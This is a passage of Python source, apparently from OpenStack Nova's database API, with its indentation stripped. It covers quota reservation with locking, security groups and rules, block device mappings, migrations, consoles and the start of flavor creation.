return result
@require_admin_context
def quota_create(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
quota_ref = models.ProjectUserQuota() if per_user else models.Quota()
if per_user:
quota_ref.user_id = user_id
quota_ref.project_id = project_id
quota_ref.resource = resource
quota_ref.hard_limit = limit
try:
quota_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.QuotaExists(project_id=project_id, resource=resource)
return quota_ref
@require_admin_context
def quota_update(context, project_id, resource, limit, user_id=None):
per_user = user_id and resource not in PER_PROJECT_QUOTAS
model = models.ProjectUserQuota if per_user else models.Quota
query = model_query(context, model).\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if per_user:
query = query.filter_by(user_id=user_id)
result = query.update({'hard_limit': limit})
if not result:
if per_user:
raise exception.ProjectUserQuotaNotFound(project_id=project_id,
user_id=user_id)
else:
raise exception.ProjectQuotaNotFound(project_id=project_id)
###################
@require_context
def quota_class_get(context, class_name, resource):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
first()
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
return result
def quota_class_get_default(context):
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=_DEFAULT_QUOTA_NAME).\
all()
result = {'class_name': _DEFAULT_QUOTA_NAME}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_context
def quota_class_get_all_by_name(context, class_name):
nova.context.authorize_quota_class_context(context, class_name)
rows = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
all()
result = {'class_name': class_name}
for row in rows:
result[row.resource] = row.hard_limit
return result
@require_admin_context
def quota_class_create(context, class_name, resource, limit):
quota_class_ref = models.QuotaClass()
quota_class_ref.class_name = class_name
quota_class_ref.resource = resource
quota_class_ref.hard_limit = limit
quota_class_ref.save()
return quota_class_ref
@require_admin_context
def quota_class_update(context, class_name, resource, limit):
result = model_query(context, models.QuotaClass, read_deleted="no").\
filter_by(class_name=class_name).\
filter_by(resource=resource).\
update({'hard_limit': limit})
if not result:
raise exception.QuotaClassNotFound(class_name=class_name)
###################
@require_context
def quota_usage_get(context, project_id, resource, user_id=None):
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource)
if user_id:
if resource not in PER_PROJECT_QUOTAS:
result = query.filter_by(user_id=user_id).first()
else:
result = query.filter_by(user_id=None).first()
else:
result = query.first()
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
return result
def _quota_usage_get_all(context, project_id, user_id=None):
nova.context.authorize_project_context(context, project_id)
query = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id)
result = {'project_id': project_id}
if user_id:
query = query.filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == None))
result['user_id'] = user_id
rows = query.all()
for row in rows:
if row.resource in result:
result[row.resource]['in_use'] += row.in_use
result[row.resource]['reserved'] += row.reserved
else:
result[row.resource] = dict(in_use=row.in_use,
reserved=row.reserved)
return result
@require_context
def quota_usage_get_all_by_project_and_user(context, project_id, user_id):
return _quota_usage_get_all(context, project_id, user_id=user_id)
@require_context
def quota_usage_get_all_by_project(context, project_id):
return _quota_usage_get_all(context, project_id)
def _quota_usage_create(context, project_id, user_id, resource, in_use,
reserved, until_refresh, session=None):
quota_usage_ref = models.QuotaUsage()
quota_usage_ref.project_id = project_id
quota_usage_ref.user_id = user_id
quota_usage_ref.resource = resource
quota_usage_ref.in_use = in_use
quota_usage_ref.reserved = reserved
quota_usage_ref.until_refresh = until_refresh
# updated_at is needed for judgement of max_age
quota_usage_ref.updated_at = timeutils.utcnow()
quota_usage_ref.save(session=session)
return quota_usage_ref
@require_admin_context
def quota_usage_update(context, project_id, user_id, resource, **kwargs):
updates = {}
for key in ['in_use', 'reserved', 'until_refresh']:
if key in kwargs:
updates[key] = kwargs[key]
result = model_query(context, models.QuotaUsage, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(resource=resource).\
filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == None)).\
update(updates)
if not result:
raise exception.QuotaUsageNotFound(project_id=project_id)
###################
def _reservation_create(context, uuid, usage, project_id, user_id, resource,
delta, expire, session=None):
reservation_ref = models.Reservation()
reservation_ref.uuid = uuid
reservation_ref.usage_id = usage['id']
reservation_ref.project_id = project_id
reservation_ref.user_id = user_id
reservation_ref.resource = resource
reservation_ref.delta = delta
reservation_ref.expire = expire
reservation_ref.save(session=session)
return reservation_ref
###################
# NOTE(johannes): The quota code uses SQL locking to ensure races don't
# cause under or over counting of resources. To avoid deadlocks, this
# code always acquires the lock on quota_usages before acquiring the lock
# on reservations.
def _get_user_quota_usages(context, session, project_id, user_id):
# Broken out for testability
rows = model_query(context, models.QuotaUsage,
read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
filter(or_(models.QuotaUsage.user_id == user_id,
models.QuotaUsage.user_id == None)).\
with_lockmode('update').\
all()
return dict((row.resource, row) for row in rows)
def _get_project_quota_usages(context, session, project_id):
rows = model_query(context, models.QuotaUsage,
read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
with_lockmode('update').\
all()
result = dict()
# Get the total count of in_use,reserved
for row in rows:
if row.resource in result:
result[row.resource]['in_use'] += row.in_use
result[row.resource]['reserved'] += row.reserved
result[row.resource]['total'] += (row.in_use + row.reserved)
else:
result[row.resource] = dict(in_use=row.in_use,
reserved=row.reserved,
total=row.in_use + row.reserved)
return result
@require_context
@_retry_on_deadlock
def quota_reserve(context, resources, project_quotas, user_quotas, deltas,
expire, until_refresh, max_age, project_id=None,
user_id=None):
elevated = context.elevated()
session = get_session()
with session.begin():
if project_id is None:
project_id = context.project_id
if user_id is None:
user_id = context.user_id
# Get the current usages
user_usages = _get_user_quota_usages(context, session,
project_id, user_id)
project_usages = _get_project_quota_usages(context, session,
project_id)
# Handle usage refresh
work = set(deltas.keys())
while work:
resource = work.pop()
# Do we need to refresh the usage?
refresh = False
if ((resource not in PER_PROJECT_QUOTAS) and
(resource not in user_usages)):
user_usages[resource] = _quota_usage_create(elevated,
project_id,
user_id,
resource,
0, 0,
until_refresh or None,
session=session)
refresh = True
elif ((resource in PER_PROJECT_QUOTAS) and
(resource not in user_usages)):
user_usages[resource] = _quota_usage_create(elevated,
project_id,
None,
resource,
0, 0,
until_refresh or None,
session=session)
refresh = True
elif user_usages[resource].in_use < 0:
# Negative in_use count indicates a desync, so try to
# heal from that...
refresh = True
elif user_usages[resource].until_refresh is not None:
user_usages[resource].until_refresh -= 1
if user_usages[resource].until_refresh <= 0:
refresh = True
elif max_age and (user_usages[resource].updated_at -
timeutils.utcnow()).seconds >= max_age:
refresh = True
# OK, refresh the usage
if refresh:
# Grab the sync routine
sync = QUOTA_SYNC_FUNCTIONS[resources[resource].sync]
updates = sync(elevated, project_id, user_id, session)
for res, in_use in updates.items():
# Make sure we have a destination for the usage!
if ((res not in PER_PROJECT_QUOTAS) and
(res not in user_usages)):
user_usages[res] = _quota_usage_create(elevated,
project_id,
user_id,
res,
0, 0,
until_refresh or None,
session=session)
if ((res in PER_PROJECT_QUOTAS) and
(res not in user_usages)):
user_usages[res] = _quota_usage_create(elevated,
project_id,
None,
res,
0, 0,
until_refresh or None,
session=session)
if user_usages[res].in_use != in_use:
LOG.debug(_('quota_usages out of sync, updating. '
'project_id: %(project_id)s, '
'user_id: %(user_id)s, '
'resource: %(res)s, '
'tracked usage: %(tracked_use)s, '
'actual usage: %(in_use)s'),
{'project_id': project_id,
'user_id': user_id,
'res': res,
'tracked_use': user_usages[res].in_use,
'in_use': in_use})
# Update the usage
user_usages[res].in_use = in_use
user_usages[res].until_refresh = until_refresh or None
# Because more than one resource may be refreshed
# by the call to the sync routine, and we don't
# want to double-sync, we make sure all refreshed
# resources are dropped from the work set.
work.discard(res)
# NOTE(Vek): We make the assumption that the sync
# routine actually refreshes the
# resources that it is the sync routine
# for. We don't check, because this is
# a best-effort mechanism.
# Check for deltas that would go negative
unders = [res for res, delta in deltas.items()
if delta < 0 and
delta + user_usages[res].in_use < 0]
# Now, let's check the quotas
# NOTE(Vek): We're only concerned about positive increments.
# If a project has gone over quota, we want them to
# be able to reduce their usage without any
# problems.
for key, value in user_usages.items():
if key not in project_usages:
project_usages[key] = value
overs = [res for res, delta in deltas.items()
if user_quotas[res] >= 0 and delta >= 0 and
(project_quotas[res] < delta +
project_usages[res]['total'] or
user_quotas[res] < delta +
user_usages[res].total)]
# NOTE(Vek): The quota check needs to be in the transaction,
# but the transaction doesn't fail just because
# we're over quota, so the OverQuota raise is
# outside the transaction. If we did the raise
# here, our usage updates would be discarded, but
# they're not invalidated by being over-quota.
# Create the reservations
if not overs:
reservations = []
for res, delta in deltas.items():
reservation = _reservation_create(elevated,
str(uuid.uuid4()),
user_usages[res],
project_id,
user_id,
res, delta, expire,
session=session)
reservations.append(reservation.uuid)
# Also update the reserved quantity
# NOTE(Vek): Again, we are only concerned here about
# positive increments. Here, though, we're
# worried about the following scenario:
#
# 1) User initiates resize down.
# 2) User allocates a new instance.
# 3) Resize down fails or is reverted.
# 4) User is now over quota.
#
# To prevent this, we only update the
# reserved value if the delta is positive.
if delta > 0:
user_usages[res].reserved += delta
# Apply updates to the usages table
for usage_ref in user_usages.values():
session.add(usage_ref)
if unders:
LOG.warning(_("Change will make usage less than 0 for the following "
"resources: %s"), unders)
if overs:
if project_quotas == user_quotas:
usages = project_usages
else:
usages = user_usages
usages = dict((k, dict(in_use=v['in_use'], reserved=v['reserved']))
for k, v in usages.items())
headroom = dict((res, user_quotas[res] -
(usages[res]['in_use'] + usages[res]['reserved']))
for res in user_quotas.keys())
# If quota_cores is unlimited [-1]:
# - set cores headroom based on instances headroom:
if user_quotas.get('cores') == -1:
if deltas['cores']:
hc = headroom['instances'] * deltas['cores']
headroom['cores'] = hc / deltas['instances']
else:
headroom['cores'] = headroom['instances']
# If quota_ram is unlimited [-1]:
# - set ram headroom based on instances headroom:
if user_quotas.get('ram') == -1:
if deltas['ram']:
hr = headroom['instances'] * deltas['ram']
headroom['ram'] = hr / deltas['instances']
else:
headroom['ram'] = headroom['instances']
raise exception.OverQuota(overs=sorted(overs), quotas=user_quotas,
usages=usages, headroom=headroom)
return reservations
def _quota_reservations_query(session, context, reservations):
"""Return the relevant reservations."""
# Get the listed reservations
return model_query(context, models.Reservation,
read_deleted="no",
session=session).\
filter(models.Reservation.uuid.in_(reservations)).\
with_lockmode('update')
@require_context
@_retry_on_deadlock
def reservation_commit(context, reservations, project_id=None, user_id=None):
session = get_session()
with session.begin():
usages = _get_user_quota_usages(context, session, project_id, user_id)
reservation_query = _quota_reservations_query(session, context,
reservations)
for reservation in reservation_query.all():
usage = usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
usage.in_use += reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@require_context
@_retry_on_deadlock
def reservation_rollback(context, reservations, project_id=None, user_id=None):
session = get_session()
with session.begin():
usages = _get_user_quota_usages(context, session, project_id, user_id)
reservation_query = _quota_reservations_query(session, context,
reservations)
for reservation in reservation_query.all():
usage = usages[reservation.resource]
if reservation.delta >= 0:
usage.reserved -= reservation.delta
reservation_query.soft_delete(synchronize_session=False)
@require_admin_context
def quota_destroy_all_by_project_and_user(context, project_id, user_id):
session = get_session()
with session.begin():
model_query(context, models.ProjectUserQuota, session=session,
read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
soft_delete(synchronize_session=False)
@require_admin_context
def quota_destroy_all_by_project(context, project_id):
session = get_session()
with session.begin():
model_query(context, models.Quota, session=session,
read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.ProjectUserQuota, session=session,
read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.QuotaUsage,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
model_query(context, models.Reservation,
session=session, read_deleted="no").\
filter_by(project_id=project_id).\
soft_delete(synchronize_session=False)
@require_admin_context
def reservation_expire(context):
session = get_session()
with session.begin():
current_time = timeutils.utcnow()
reservation_query = model_query(context, models.Reservation,
session=session, read_deleted="no").\
filter(models.Reservation.expire < current_time)
for reservation in reservation_query.join(models.QuotaUsage).all():
if reservation.delta >= 0:
reservation.usage.reserved -= reservation.delta
session.add(reservation.usage)
reservation_query.soft_delete(synchronize_session=False)
###################
def _ec2_volume_get_query(context, session=None):
return model_query(context, models.VolumeIdMapping,
session=session, read_deleted='yes')
def _ec2_snapshot_get_query(context, session=None):
return model_query(context, models.SnapshotIdMapping,
session=session, read_deleted='yes')
@require_context
def ec2_volume_create(context, volume_uuid, id=None):
"""Create ec2 compatible volume by provided uuid."""
ec2_volume_ref = models.VolumeIdMapping()
ec2_volume_ref.update({'uuid': volume_uuid})
if id is not None:
ec2_volume_ref.update({'id': id})
ec2_volume_ref.save()
return ec2_volume_ref
@require_context
def get_ec2_volume_id_by_uuid(context, volume_id):
result = _ec2_volume_get_query(context).\
filter_by(uuid=volume_id).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=volume_id)
return result['id']
@require_context
def get_volume_uuid_by_ec2_id(context, ec2_id):
result = _ec2_volume_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.VolumeNotFound(volume_id=ec2_id)
return result['uuid']
@require_context
def ec2_snapshot_create(context, snapshot_uuid, id=None):
"""Create ec2 compatible snapshot by provided uuid."""
ec2_snapshot_ref = models.SnapshotIdMapping()
ec2_snapshot_ref.update({'uuid': snapshot_uuid})
if id is not None:
ec2_snapshot_ref.update({'id': id})
ec2_snapshot_ref.save()
return ec2_snapshot_ref
@require_context
def get_ec2_snapshot_id_by_uuid(context, snapshot_id):
result = _ec2_snapshot_get_query(context).\
filter_by(uuid=snapshot_id).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=snapshot_id)
return result['id']
@require_context
def get_snapshot_uuid_by_ec2_id(context, ec2_id):
result = _ec2_snapshot_get_query(context).\
filter_by(id=ec2_id).\
first()
if not result:
raise exception.SnapshotNotFound(snapshot_id=ec2_id)
return result['uuid']
###################
def _block_device_mapping_get_query(context, session=None,
columns_to_join=None, use_slave=False):
if columns_to_join is None:
columns_to_join = []
query = model_query(context, models.BlockDeviceMapping,
session=session, use_slave=use_slave)
for column in columns_to_join:
query = query.options(joinedload(column))
return query
def _scrub_empty_str_values(dct, keys_to_scrub):
"""Remove any keys found in sequence keys_to_scrub from the dict
if they have the value ''.
"""
for key in keys_to_scrub:
if key in dct and dct[key] == '':
del dct[key]
def _from_legacy_values(values, legacy, allow_updates=False):
if legacy:
if allow_updates and block_device.is_safe_for_update(values):
return values
else:
return block_device.BlockDeviceDict.from_legacy(values)
else:
return values
@require_context
def block_device_mapping_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy)
bdm_ref = models.BlockDeviceMapping()
bdm_ref.update(values)
bdm_ref.save()
return bdm_ref
@require_context
def block_device_mapping_update(context, bdm_id, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
query = _block_device_mapping_get_query(context).filter_by(id=bdm_id)
query.update(values)
return query.first()
def block_device_mapping_update_or_create(context, values, legacy=True):
_scrub_empty_str_values(values, ['volume_size'])
values = _from_legacy_values(values, legacy, allow_updates=True)
session = get_session()
with session.begin():
result = None
# NOTE(xqueralt): Only update a BDM when device_name was provided. We
# allow empty device names so they will be set later by the manager.
if values['device_name']:
query = _block_device_mapping_get_query(context, session=session)
result = query.filter_by(instance_uuid=values['instance_uuid'],
device_name=values['device_name']).first()
if result:
result.update(values)
else:
# Either the device_name doesn't exist in the database yet, or no
# device_name was provided. Both cases mean creating a new BDM.
result = models.BlockDeviceMapping(**values)
result.save(session=session)
# NOTE(xqueralt): Prevent from having multiple swap devices for the
# same instance. This will delete all the existing ones.
if block_device.new_format_is_swap(values):
query = _block_device_mapping_get_query(context, session=session)
query = query.filter_by(instance_uuid=values['instance_uuid'],
source_type='blank', guest_format='swap')
query = query.filter(models.BlockDeviceMapping.id != result.id)
query.soft_delete()
return result
@require_context
def block_device_mapping_get_all_by_instance(context, instance_uuid,
use_slave=False):
return _block_device_mapping_get_query(context, use_slave=use_slave).\
filter_by(instance_uuid=instance_uuid).\
all()
@require_context
def block_device_mapping_get_by_volume_id(context, volume_id,
columns_to_join=None):
return _block_device_mapping_get_query(context,
columns_to_join=columns_to_join).\
filter_by(volume_id=volume_id).\
first()
@require_context
def block_device_mapping_destroy(context, bdm_id):
_block_device_mapping_get_query(context).\
filter_by(id=bdm_id).\
soft_delete()
@require_context
def block_device_mapping_destroy_by_instance_and_volume(context, instance_uuid,
volume_id):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(volume_id=volume_id).\
soft_delete()
@require_context
def block_device_mapping_destroy_by_instance_and_device(context, instance_uuid,
device_name):
_block_device_mapping_get_query(context).\
filter_by(instance_uuid=instance_uuid).\
filter_by(device_name=device_name).\
soft_delete()
###################
def _security_group_create(context, values, session=None):
security_group_ref = models.SecurityGroup()
# FIXME(devcamcar): Unless I do this, rules fails with lazy load exception
# once save() is called. This will get cleaned up in next orm pass.
security_group_ref.rules
security_group_ref.update(values)
try:
security_group_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=values['project_id'],
security_group_name=values['name'])
return security_group_ref
def _security_group_get_query(context, session=None, read_deleted=None,
project_only=False, join_rules=True):
query = model_query(context, models.SecurityGroup, session=session,
read_deleted=read_deleted, project_only=project_only)
if join_rules:
query = query.options(joinedload_all('rules.grantee_group'))
return query
def _security_group_get_by_names(context, session, project_id, group_names):
"""Get security group models for a project by a list of names.
Raise SecurityGroupNotFoundForProject for a name not found.
"""
query = _security_group_get_query(context, session=session,
read_deleted="no", join_rules=False).\
filter_by(project_id=project_id).\
filter(models.SecurityGroup.name.in_(group_names))
sg_models = query.all()
if len(sg_models) == len(group_names):
return sg_models
# Find the first one missing and raise
group_names_from_models = [x.name for x in sg_models]
for group_name in group_names:
if group_name not in group_names_from_models:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
# Not Reached
@require_context
def security_group_get_all(context):
return _security_group_get_query(context).all()
@require_context
def security_group_get(context, security_group_id, columns_to_join=None):
query = _security_group_get_query(context, project_only=True).\
filter_by(id=security_group_id)
if columns_to_join is None:
columns_to_join = []
for column in columns_to_join:
if column.startswith('instances'):
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
return result
@require_context
def security_group_get_by_name(context, project_id, group_name,
columns_to_join=None):
query = _security_group_get_query(context,
read_deleted="no", join_rules=False).\
filter_by(project_id=project_id).\
filter_by(name=group_name)
if columns_to_join is None:
columns_to_join = ['instances', 'rules.grantee_group']
for column in columns_to_join:
query = query.options(joinedload_all(column))
result = query.first()
if not result:
raise exception.SecurityGroupNotFoundForProject(
project_id=project_id, security_group_id=group_name)
return result
@require_context
def security_group_get_by_project(context, project_id):
return _security_group_get_query(context, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@require_context
def security_group_get_by_instance(context, instance_uuid):
return _security_group_get_query(context, read_deleted="no").\
join(models.SecurityGroup.instances).\
filter_by(uuid=instance_uuid).\
all()
@require_context
def security_group_in_use(context, group_id):
session = get_session()
with session.begin():
# Are there any instances that haven't been deleted
# that include this group?
inst_assoc = model_query(context,
models.SecurityGroupInstanceAssociation,
read_deleted="no", session=session).\
filter_by(security_group_id=group_id).\
all()
for ia in inst_assoc:
num_instances = model_query(context, models.Instance,
session=session, read_deleted="no").\
filter_by(uuid=ia.instance_uuid).\
count()
if num_instances:
return True
return False
@require_context
def security_group_create(context, values):
return _security_group_create(context, values)
@require_context
def security_group_update(context, security_group_id, values,
columns_to_join=None):
session = get_session()
with session.begin():
query = model_query(context, models.SecurityGroup,
session=session).filter_by(id=security_group_id)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload_all(column))
security_group_ref = query.first()
if not security_group_ref:
raise exception.SecurityGroupNotFound(
security_group_id=security_group_id)
security_group_ref.update(values)
name = security_group_ref['name']
project_id = security_group_ref['project_id']
try:
security_group_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.SecurityGroupExists(
project_id=project_id,
security_group_name=name)
return security_group_ref
def security_group_ensure_default(context):
"""Ensure default security group exists for a project_id."""
session = get_session()
with session.begin():
try:
default_group = _security_group_get_by_names(context,
session,
context.project_id,
['default'])[0]
except exception.NotFound:
values = {'name': 'default',
'description': 'default',
'user_id': context.user_id,
'project_id': context.project_id}
default_group = _security_group_create(context, values,
session=session)
usage = model_query(context, models.QuotaUsage,
read_deleted="no", session=session).\
filter_by(project_id=context.project_id).\
filter_by(user_id=context.user_id).\
filter_by(resource='security_groups')
# Create quota usage for auto created default security group
if not usage.first():
elevated = context.elevated()
_quota_usage_create(elevated,
context.project_id,
context.user_id,
'security_groups',
1, 0,
None,
session=session)
else:
usage.update({'in_use': int(usage.first().in_use) + 1})
default_rules = _security_group_rule_get_default_query(context,
session=session).all()
for default_rule in default_rules:
# This is suboptimal, it should be programmatic to know
# the values of the default_rule
rule_values = {'protocol': default_rule.protocol,
'from_port': default_rule.from_port,
'to_port': default_rule.to_port,
'cidr': default_rule.cidr,
'parent_group_id': default_group.id,
}
_security_group_rule_create(context,
rule_values,
session=session)
return default_group
@require_context
def security_group_destroy(context, security_group_id):
session = get_session()
with session.begin():
model_query(context, models.SecurityGroup,
session=session).\
filter_by(id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupInstanceAssociation,
session=session).\
filter_by(security_group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule,
session=session).\
filter_by(group_id=security_group_id).\
soft_delete()
model_query(context, models.SecurityGroupIngressRule,
session=session).\
filter_by(parent_group_id=security_group_id).\
soft_delete()
def _security_group_count_by_project_and_user(context, project_id, user_id,
session=None):
nova.context.authorize_project_context(context, project_id)
return model_query(context, models.SecurityGroup, read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
count()
###################
def _security_group_rule_create(context, values, session=None):
security_group_rule_ref = models.SecurityGroupIngressRule()
security_group_rule_ref.update(values)
security_group_rule_ref.save(session=session)
return security_group_rule_ref
def _security_group_rule_get_query(context, session=None):
return model_query(context, models.SecurityGroupIngressRule,
session=session)
@require_context
def security_group_rule_get(context, security_group_rule_id):
result = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
first())
if not result:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
return result
@require_context
def security_group_rule_get_by_security_group(context, security_group_id,
columns_to_join=None):
if columns_to_join is None:
columns_to_join = ['grantee_group.instances.system_metadata',
'grantee_group.instances.info_cache']
query = (_security_group_rule_get_query(context).
filter_by(parent_group_id=security_group_id))
for column in columns_to_join:
query = query.options(joinedload_all(column))
return query.all()
@require_context
def security_group_rule_get_by_security_group_grantee(context,
security_group_id):
return (_security_group_rule_get_query(context).
filter_by(group_id=security_group_id).
all())
@require_context
def security_group_rule_create(context, values):
return _security_group_rule_create(context, values)
@require_context
def security_group_rule_destroy(context, security_group_rule_id):
count = (_security_group_rule_get_query(context).
filter_by(id=security_group_rule_id).
soft_delete())
if count == 0:
raise exception.SecurityGroupNotFoundForRule(
rule_id=security_group_rule_id)
@require_context
def security_group_rule_count_by_group(context, security_group_id):
return (model_query(context, models.SecurityGroupIngressRule,
read_deleted="no").
filter_by(parent_group_id=security_group_id).
count())
#
###################
def _security_group_rule_get_default_query(context, session=None):
return model_query(context, models.SecurityGroupIngressDefaultRule,
session=session)
@require_context
def security_group_default_rule_get(context, security_group_rule_default_id):
result = _security_group_rule_get_default_query(context).\
filter_by(id=security_group_rule_default_id).\
first()
if not result:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
return result
@require_admin_context
def security_group_default_rule_destroy(context,
security_group_rule_default_id):
session = get_session()
with session.begin():
count = _security_group_rule_get_default_query(context,
session=session).\
filter_by(id=security_group_rule_default_id).\
soft_delete()
if count == 0:
raise exception.SecurityGroupDefaultRuleNotFound(
rule_id=security_group_rule_default_id)
@require_admin_context
def security_group_default_rule_create(context, values):
security_group_default_rule_ref = models.SecurityGroupIngressDefaultRule()
security_group_default_rule_ref.update(values)
security_group_default_rule_ref.save()
return security_group_default_rule_ref
@require_context
def security_group_default_rule_list(context):
return _security_group_rule_get_default_query(context).\
all()
###################
@require_admin_context
def provider_fw_rule_create(context, rule):
fw_rule_ref = models.ProviderFirewallRule()
fw_rule_ref.update(rule)
fw_rule_ref.save()
return fw_rule_ref
@require_admin_context
def provider_fw_rule_get_all(context):
return model_query(context, models.ProviderFirewallRule).all()
@require_admin_context
def provider_fw_rule_destroy(context, rule_id):
session = get_session()
with session.begin():
session.query(models.ProviderFirewallRule).\
filter_by(id=rule_id).\
soft_delete()
###################
@require_context
def project_get_networks(context, project_id, associate=True):
# NOTE(tr3buchet): as before this function will associate
# a project with a network if it doesn't have one and
# associate is true
result = model_query(context, models.Network, read_deleted="no").\
filter_by(project_id=project_id).\
all()
if not result:
if not associate:
return []
return [network_associate(context, project_id)]
return result
###################
@require_admin_context
def migration_create(context, values):
migration = models.Migration()
migration.update(values)
migration.save()
return migration
@require_admin_context
def migration_update(context, id, values):
session = get_session()
with session.begin():
migration = _migration_get(context, id, session=session)
migration.update(values)
return migration
def _migration_get(context, id, session=None):
result = model_query(context, models.Migration, session=session,
read_deleted="yes").\
filter_by(id=id).\
first()
if not result:
raise exception.MigrationNotFound(migration_id=id)
return result
@require_admin_context
def migration_get(context, id):
return _migration_get(context, id)
@require_admin_context
def migration_get_by_instance_and_status(context, instance_uuid, status):
result = model_query(context, models.Migration, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid).\
filter_by(status=status).\
first()
if not result:
raise exception.MigrationNotFoundByStatus(instance_id=instance_uuid,
status=status)
return result
@require_admin_context
def migration_get_unconfirmed_by_dest_compute(context, confirm_window,
dest_compute, use_slave=False):
confirm_window = (timeutils.utcnow() -
datetime.timedelta(seconds=confirm_window))
return model_query(context, models.Migration, read_deleted="yes",
use_slave=use_slave).\
filter(models.Migration.updated_at <= confirm_window).\
filter_by(status="finished").\
filter_by(dest_compute=dest_compute).\
all()
@require_admin_context
def migration_get_in_progress_by_host_and_node(context, host, node):
return model_query(context, models.Migration).\
filter(or_(and_(models.Migration.source_compute == host,
models.Migration.source_node == node),
and_(models.Migration.dest_compute == host,
models.Migration.dest_node == node))).\
filter(~models.Migration.status.in_(['confirmed', 'reverted',
'error'])).\
options(joinedload_all('instance.system_metadata')).\
all()
@require_admin_context
def migration_get_all_by_filters(context, filters):
query = model_query(context, models.Migration)
if "status" in filters:
query = query.filter(models.Migration.status == filters["status"])
if "host" in filters:
host = filters["host"]
query = query.filter(or_(models.Migration.source_compute == host,
models.Migration.dest_compute == host))
return query.all()
##################
def console_pool_create(context, values):
pool = models.ConsolePool()
pool.update(values)
try:
pool.save()
except db_exc.DBDuplicateEntry:
raise exception.ConsolePoolExists(
host=values["host"],
console_type=values["console_type"],
compute_host=values["compute_host"],
)
return pool
def console_pool_get_by_host_type(context, compute_host, host,
console_type):
result = model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
filter_by(compute_host=compute_host).\
options(joinedload('consoles')).\
first()
if not result:
raise exception.ConsolePoolNotFoundForHostType(
host=host, console_type=console_type,
compute_host=compute_host)
return result
def console_pool_get_all_by_host_type(context, host, console_type):
return model_query(context, models.ConsolePool, read_deleted="no").\
filter_by(host=host).\
filter_by(console_type=console_type).\
options(joinedload('consoles')).\
all()
def console_create(context, values):
console = models.Console()
console.update(values)
console.save()
return console
def console_delete(context, console_id):
session = get_session()
with session.begin():
# NOTE(mdragon): consoles are meant to be transient.
session.query(models.Console).\
filter_by(id=console_id).\
delete()
def console_get_by_pool_instance(context, pool_id, instance_uuid):
result = model_query(context, models.Console, read_deleted="yes").\
filter_by(pool_id=pool_id).\
filter_by(instance_uuid=instance_uuid).\
options(joinedload('pool')).\
first()
if not result:
raise exception.ConsoleNotFoundInPoolForInstance(
pool_id=pool_id, instance_uuid=instance_uuid)
return result
def console_get_all_by_instance(context, instance_uuid, columns_to_join=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(instance_uuid=instance_uuid)
if columns_to_join:
for column in columns_to_join:
query = query.options(joinedload(column))
return query.all()
def console_get(context, console_id, instance_uuid=None):
query = model_query(context, models.Console, read_deleted="yes").\
filter_by(id=console_id).\
options(joinedload('pool'))
if instance_uuid is not None:
query = query.filter_by(instance_uuid=instance_uuid)
result = query.first()
if not result:
if instance_uuid:
raise exception.ConsoleNotFoundForInstance(
console_id=console_id, instance_uuid=instance_uuid)
else:
raise exception.ConsoleNotFound(console_id=console_id)
return result
##################
@require_admin_context
def flavor_create(context, values, projects=None):
"""Create a new instance type. In order to pass in extra specs,
the values dict should contain a 'extra_specs' key/value pair:
{'extra_specs' : {'k1': 'v1', 'k2': 'v2', ...}}
"""
specs = values.get('extra_specs')
specs_refs = []
if specs:
for k, v in specs.iteritems():
specs_ref = models.InstanceTypeExtraSpecs()
specs_ref['key'] = k
